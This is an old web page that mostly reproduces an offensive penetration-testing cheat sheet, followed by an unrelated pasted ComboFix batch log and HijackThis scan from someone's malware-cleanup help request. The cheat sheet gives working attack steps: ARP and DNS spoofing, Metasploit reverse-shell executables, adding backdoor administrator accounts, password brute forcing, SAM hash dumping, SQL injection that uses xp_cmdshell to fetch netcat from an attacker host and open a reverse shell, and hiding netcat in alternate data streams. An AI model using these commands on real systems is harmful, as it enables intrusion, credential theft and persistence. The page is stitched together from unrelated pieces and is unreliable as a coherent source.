Grep For Windows 2000
Wed, 28 Oct 2009 07:09:38 +0000
Table of Contents:
I. Networking
II. Services
III. Basics
IV. Foot printing
V. Scanning
VI. Windows Enumeration
VII. ARP Spoofing
VIII. Exploits
IX. Metasploit
What to do after gaining a remote shell
X. TFTP
XI. Netcat
XII. Passwords
XIII. Physical Access
XIV. SQL Injection
XV. Alternate Data Streams
XVI. A White Hat’s Pen Test
Networking:
dhcpcd :get a new IP address
Renew dynamic IP address:
dhcpcd -k :release IP address
ifconfig eth0 up :bring up the NIC
dhcpcd :get a new IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 :set IP address & sub net mask
route add default gw 192.168.0.1 :set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf :set DNS server
Backtrack 4 config:
/etc/init.d/networking start :get a new ip address
/etc/init.d/wicd start :start wireless adapter
Services:
Apache server:
apachectl start start server on TCP port 80
apachectl stop stop server
SSH server:
sshd-generate generate ssh keys
/usr/sbin/sshd start server on TCP port 22
pkill sshd stop server
ssh user@targetIP
TFTP server:
atftpd –daemon –port 69 /tmp/ start server on UDP port 69 with a root directory of tmp
pkill tftpd stop server
VNC server:
Vncserver start server on TCP port 5901
pkill Xvnc stop server
Check what ports are listening:
netstat –ant show listening TCP ports
netstat –anu show listening UDP ports
netstat -ant | grep 22 verify ssh has started
netstat -anu | grep 69 verify tftp has started
Basics:
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share umount share
Edit a file:
nano test.sh create a new file and open it
x exit
Y save modified buffer
write changes
chmod 755 test.sh make the file executable
./test.sh run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz
cd to the new program folder method 2: bzip2 -cd program.tar.bz2 | tar xvf -
./configure
make
su root
make install
Footprinting:
Whois:
whois target.com contact info, emails, dates, name servers
ping www.target.com IP address of web server
whois targetIP network range
DNS:
dig target.com any
A
PTR Host maps a domain to an IP address
NS Pointer maps an IP address to a domain
SOA name Server server name for a delegated zone
SRV start of authority zone transfer and record caching
MX service locator used to locate services in the network
host -l target.com zone transfer
Scanning:
scanrand -b10M targetIP:quick
nmap:
-sS TCP SYN scan or Stealth, half open (default)
-sT TCP full connect (very noisy)
-sU UDP scan
-PS SYN packet discovery (best against stateful firewalls)
-PA ACK packet discovery (best against stateless firewalls)
-PN don’t ping
-n no reverse DNS lookup
-A combines -O and -sV
-O OS fingerprinting
-sV service version (banner)
-p ports to scan (T:port,U:port)
-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL input list of hosts to scan
-oG grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U –p use interface eth0, don’t display unknown signatures, promiscuous
point a browser to the targetIP read traffic on p0f
xprobe2 targetIP
Banner Grabbing:
nc targetIP port check if the port is open
nc 10.1.1.2 80
telnet targetIP port telnet may yield slightly different results
HEAD /HTTP/1.0
wget targetIP downloads the index.html file
cat index.html | more view file one page at a time, space bar for next page
q exit file
Windows Enumeration:
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP name, OS and workgroup
smbdumpusers -i targetIP list users
smbclient -L //targetIP list shares
Using Windows
net use \\targetIP\ipc$ “” /u:”" start a NULL session
net view \\targetIP view shares
smbclient:
smbclient -L hostName -I targetIP enumerate shares
smbclient -L hostName/share -U “” connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin connect to open share with user name admin
rpcclient:
rpcclient targetIP -U “” start a NULL session
netshareenum enumerate shares
enumdomusers enumerate users
lsaenumsid enumerate domain SIDs
queryuser RID user info, try 500, 501, 1000, 1001
createdomuser create user account
ARP Spoofing:
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
Exploits:
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep “#include”
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u
Metasploit:
svn update update framework
Web Interface:
./msfweb open a browser to 127.0.0.1:55555
Console:
./msfconsole
help
show encoders,nops,exploits,payloads.auxillary
search
use
show options
set set RHOST 192.168.1.3
show payloads
set PAYLOAD
show options
set set LHOST 192.168.1.2
show targets
set TARGET set TARGET 0
exploit
Interactive sessions:
sessions –l list active sessions
sessions -i sessions -i 4, interact with session 4
sessions -k sessions -k 4, kill session 4
z background a session
c kill a session
Jobs list exploit jobs running
jobs –K kill all jobs
Auxiliary scanners:
show auxiliary
use
set
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Meterpreter
Automated:
db_import_nessus_nbe import Nessus results in NBE format
db_import_nmap_xml import nmap results in XML format (-oX)
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest delete old database called pentest
db_create pentest create a new database call pentest
db_nmap targetIP run nmap through the framework and store results in database
db_hosts show hosts discovered
db_services show services running on each host
db_autopwn show options
db_autopwn -t -p –e select modules based on open ports, show matching exploits, exploit
Command Line Interface:
./msfcli | grep -i search for an exploit or auxiliary
./msfcli S summary info
./msfcli = PAYLOAD= E
Payload generator:
./msfpayload
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
Encode shellcode:
./msfencode
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -e PexFnstenvMor -t c
What to do after gaining a remote shell:
Hostname name of computer
net users list users
net user x hack /add add user “x” with password “hack”
net user x /add add user “x” with NO password
net localgroup list security groups
net localgroup administrators list users in Administrators group
net localgroup administrators x /add add user “x” to Administrators group
Don’t use interactive programs like FTP from a remote shell
TFTP:
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
Netcat:
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 scan ports 1 to 1024
Chat session:
target: nc -lvp 4444 start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com –accept=pdf -f switch will read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair backup copy not locked by the OS
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x Where x is Channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access:
Mount a NTFS share in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot
SQL Injection:
nmap -sS -p 1521 targetIP oracle
nmap -sS -p T:1433,U:1434 targetIP ms sql
Release Version of SqlServer.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.384.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
‘ or 1=1– minus minus closes the SQL query, everything after it is ignored
Enumerating table names:
‘ having 1=1–
‘ group by table having 1=1–
‘ group by table, table2 having 1=1–
‘ group by table, table2, table3 having 1=1–
Enumerating column types:
union select sum(column) from table –
union select sum(column2) from table –
Adding data:
‘ ; insert into table values(’value’,'value2′,’value3′)–
MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
‘ ; exec sp_makewebtask “c:\Inetpub\wwwroot\test.html”, “select * from table” ; –
www.target.com/test.html
Run ipconfig on target and write to a file, that you can view with a browser.
‘ or 1=1; exec master..xp_cmdshell ‘ “ipconfig” > c:\Inetpub\wwwroot\test.txt’ ;–
www.target.com/test.txt
Upload netcat and spawn a reverse shell.
‘ or 1=1; exec master..xp_cmdshell ‘ “tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe’ ; –
attacker: nc -lvp 53
Alternate Data Streams:
Hide netcat inside a text file. Note netcat must be located in the current directory.
echo “This is a test” > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
A White Hat’s Pen Test by Muts:
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit config file to open more port on the router, 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server
Tweet This Post
Still nothing? So I searched for the log in my C: drive and there are two folders and a text document. They were created when I installed Combofix.The folders are called "Qoobox", "32788R22FWJFW" and the text doc is called "Bug" and I posted it below:
32788R22FWJFW\swreg.exe import 32788R22FWJFW\EXE.reg
32788R22FWJFW\PEV.exe UZIP 32788R22FWJFW\License\pv_5_2_2.zip 32788R22FWJFW\
MOVE /Y 32788R22FWJFW\PV.exe 32788R22FWJFW\PV.cfxxe
32788R22FWJFW\PV.cfxxe -kf *.pif nircmd.* ANDRE.EXE TOLO.exe Merlin.scr jalang.exe jalangkung.exe jantungan.exe DOSEN.exe C3W3K4MPUS.exe cmd.exe
Killing '*.pif'
Killing 'nircmd.*'
"C:\32788R22FWJFW\nircmd.cfxxe" cmdwait 1700 exec hide "C:\WINDOWS\system32\cmd.execf" /c 32788R22FWJFW\prep.cmd (2600)
Killing 'ANDRE.EXE'
Killing 'TOLO.exe'
Killing 'Merlin.scr'
Killing 'jalang.exe'
Killing 'jalangkung.exe'
Killing 'jantungan.exe'
Killing 'DOSEN.exe'
Killing 'C3W3K4MPUS.exe'
Killing 'cmd.exe'
PUSHD "C:\32788R22FWJFW"
IF NOT EXIST pev.cfxxe COPY /Y pev.exe pev.cfxxe
1 file(s) copied.
IF NOT EXIST NircmdB.exe COPY /Y Nircmd.cfxxe NircmdB.exe
1 file(s) copied.
SET "Comspec=C:\WINDOWS\system32\cmd.execf"
IF NOT EXIST C:\WINDOWS\system32\cmd.exe GOTO Not_NT
IF EXIST OsVer EXIT
VER 1>OsVer
GREP.cfxxe -F "5.2." OsVer
IF 1 == 0 GOTO Not_NT
GREP.cfxxe -F "5.1.2" OsVer 1>XP.mac
IF 0 == 0 GOTO NT
GREP.cfxxe -isq "ProductType.*WinNT" WinNT00 || GOTO Not_NT
SED.cfxxe "/^PATH=/I!d; s///; s/\x22//g" Oripath 1>OriPath00
PEV.EXE -rtf -s+901 .\OriPath00 && (
SED.cfxxe -r "s/\x22//g; s/(.{900}).*/\1/; s/;[^;]*$//" OriPath00 1>OriPath01
FOR /F "TOKENS=*" %G IN (OriPath01) DO @SET "PATH=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\w bem;%G"
)
IF NOT EXIST OriPath01 FOR /F "TOKENS=*" %G IN (OriPath00) DO SET "PATH=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\w bem;%G"
SET "PATH=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\w bem;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;C:\PCDRSDK\WIND SAPI\bin;C:\WINDOWS\system32\gs\gs7.05\bin"
Killing 'runonce.exe'
Killing 'grpconv.exe'
Killing 'procmon.exe'
Killing 'ANDRE.EXE'
Killing 'TOLO.exe'
Killing 'Merlin.scr'
Killing 'jalang.exe'
Killing 'jalangkung.exe'
Killing 'jantungan.exe'
Killing 'DOSEN.exe'
Killing 'C3W3K4MPUS.exe'
pv: No matching processes found
PEV -rtf --c:##5# .\* and { License.exe or 32788R22FWJFW.exe or OsVer.exe or WinNT.exe or N_.exe } 1>temp00 && (
PV -o%f * 1>temp01
PEV -tf -t!o --files:temp01 --c:##5#b#f# 1>temp02
GREP -Fif temp00 temp02 1>temp03
SED "/.* /!d; s///" temp03 1>temp04
SED ":a; $!N; s/\n/\x22 \x22/; ta; s/.*/\x22&\x22/" temp04 1>temp05
FOR /F "TOKENS=*" %G IN (temp05) DO @NIRCMD KILLPROCESS %G
)
CALL :MDCheck
Could Not Find C:\32788R22FWJFW\md5sum00.pif
PEV -rtf -md5C589B205BC02BE2E1636B9448FF6D47C .\md5sum.pif || CALL :MDFaiL ChkSum_Fail
.\md5sum.pif
PEV -tf --files:files.pif --c:##5#b#f# 1>mdCheck00.dat
GREP -vs "^!MD5:" mdCheck00.dat 1>mdCheck0a.dat
GREP -Fvf md5sum.pif mdCheck0a.dat 1>mdCheck01.dat && CALL :MDFaiL
GOTO :EOF
=============================================
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\Owner\Application Data
cfExt=cfxxe
CFLDR=32788R22FWJFW
Chksum=C589B205BC02BE2E1636B9448FF6D47C
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ROGERLAPTOP
ComSpec=C:\WINDOWS\system32\cmd.execf
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\Owner
KMD=CF14938.exe
LOGONSERVER=\\ROGERLAPTOP
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\32788R22FWJFW;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wb em;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\wbem;C:\PCDRSDK\WINDS API\bin;C:\WINDOWS\system32\gs\gs7.05\bin
PATHEXT=.cfxxe;.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 4, GenuineIntel
PROCESSOR_LEVEL=15
PROCESSOR_REVISION=0204
ProgramFiles=C:\Program Files
PROMPT=$
Qrntn=C:\Qoobox\Quarantine
RKEY_=hklm\software\microsoft\windows nt\currentversion\windows
SESSIONNAME=Console
sfxcmd="C:\Documents and Settings\Owner\Desktop\2d45fty7er.exe"
sfxname=C:\Documents and Settings\Owner\Desktop\2d45fty7er.exe
SYSTEM=C:\WINDOWS\system32
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\Owner\LOCALS~1\Temp
TMP=C:\DOCUME~1\Owner\LOCALS~1\Temp
USERDOMAIN=ROGERLAPTOP
USERNAME=Owner
USERPROFILE=C:\Documents and Settings\Owner
windir=C:\WINDOWS
=============================================
IF NOT DEFINED sfxname GOTO END
GREP -F \ temp01 && CALL :Aux
GREP -Fi "C:\WINDOWS\system32\userinit.exe" Userinit00 || (SWREG ADD "hklm\software\microsoft\windows nt\currentversion\winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe," )
Userinit REG_SZ C:\WINDOWS\system32\userinit.exe,
CALL LANG.bat
Active code page: 1252
SET SfxCmd 1>SET00
SED -r "/SfxCmd=/I!d; s///; s/\s*$//; s/^(\x22[^\x22]*\x22|[^\x22]\S*) +//; s/^\x22*C:\\Documents and Settings\\Owner\\Desktop\\2d45fty7er.exe\x22*//I; s/^([^\x22]\S*)/@SET SfxCmd=\x22\1\x22/; s/^(\x22.*)/@SET SfxCmd=\1/" SET00 1>sfx.cmd
DEL /A/F SET00
ATTRIB +R "C:\Documents and Settings\Owner\Desktop\2d45fty7er.exe"
CALL sfx.cmd
CALL AV.cmd
SET /a AVCount+=1
CSCRIPT.exe //NOLOGO //E:VBSCRIPT //B //T:08 av.vbs
IF NOT EXIST AvBlack00 GREP -Fisf AVBlack resident.txt 1>AvBlack00 && (
SED -r "s/\x22//g; s/.*\) //; s/.*(\{.{8}-.{4}-.{4}-.{4}-.{12}\}).*/\1/" AvBlack00 1>AvBlack01
FOR /F "TOKENS=*" %G IN (AvBlack01) DO @CSCRIPT.EXE //NOLOGO //E:VBSCRIPT //T:5 wmi_rem.vbs "%~G"
CSCRIPT.exe //NOLOGO //E:VBSCRIPT //B //T:08 av.vbs
)
GREP -Fivf AVWhite resident.txt | GREP -E "^(AV|SP): .*enabled\* \(" 1>AVChk && (
SED -r "s/^AV:/antivirus: /; s/^SP:/antispyware: /; s/ \*(On-access scanning |)enabled\*.*//" AVChk | SED ":a; $!N;s/\n/~n/;ta" 1>AVChkB
NIRCMD LOOP 2 80 BEEP 3000 200
IF 1 LEQ 1 FOR /F "TOKENS=*" %G IN (AVChkB) DO @NIRCMD INFOBOX "ComboFix has detected the following real time scanner(s) to be active:~n~n%G~n~nAntivirus and intrusion prevention programs are known to interfere~nwith ComboFix's running. This may lead to unpredictable results or~npossible machine damage.~n~nPlease disable these scanners before clicking 'OK'." "Warning !!" "" && GOTO Av-check
IF 1 GTR 1 FOR /F "TOKENS=*" %G IN (AVChkB) DO @NIRCMD INFOBOX "%G~n~nThe above real time scanner(s) are still active but ComboFix shall~ncontinue to run. Kindly note that this is at your own risk" "Warning !!" ""
)
_______________________________________________________________________
And I got tired of waiting so I ran the Hijackthis log soon after and here it is:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:19:31 PM, on 8/28/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16876)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Sprint\Sprint PCS Connection Manager\CMSPCSUtilSvc.exe
C:\WINDOWS\System32\svchost.exe
\?\globalroot\C:\WINDOWS\system32\msihost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\cmd.execf
C:\32788R22FWJFW\grep.cfxxe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
N3 - Netscape 7: user_pref("browser.startup.homepage", "http://my.yahoo.com/"); (C:\Documents and Settings\OWNER\Application Data\Mozilla\Profiles\default\k5ovwk4u.slt\prefs.js)
N3 - Netscape 7: user_pref("browser.search.defaultengine", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%206%5Csearchplugins%5CSBWeb_01 .src"); (C:\Documents and Settings\OWNER\Application Data\Mozilla\Profiles\default\k5ovwk4u.slt\prefs.js)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Weather] C:\Program Files\AWS\WeatherBug\Weather.exe 1
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=http://www.fujitsupc.com/
O16 - DPF: {49232000-16E4-426C-A231-62846947304B} (SysData Class) - http://ipgweb.cce.hp.com/rdqnbk/downloads/sysinfo.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/micr...?1208885986764
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1208885966835
O17 - HKLM\System\CCS\Services\Tcpip\..\{AE97C0FA-D1DE-417E-9A2E-0350D915C6C2}: NameServer = 1.1.2.108,151.164.1.8
O17 - HKLM\System\CCS\Services\Tcpip\..\{E1088878-FE6B-4281-8A84-1766D09E92D8}: NameServer = 151.164.11.201,151.164.1.8
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: Sprint PCS v3 Utility Service - Sprint Spectrum, L.L.C - C:\Program Files\Sprint\Sprint PCS Connection Manager\CMSPCSUtilSvc.exe
O23 - Service: Symantec RemoteAssist - Symantec, Inc. - C:\Program Files\Common Files\Symantec Shared\Support Controls\ssrc.exe
O23 - Service: Windows MSI - Unknown owner - \\?\globalrootC:\WINDOWS\system32\msihost.exe (file missing)
--
End of file - 4667 bytes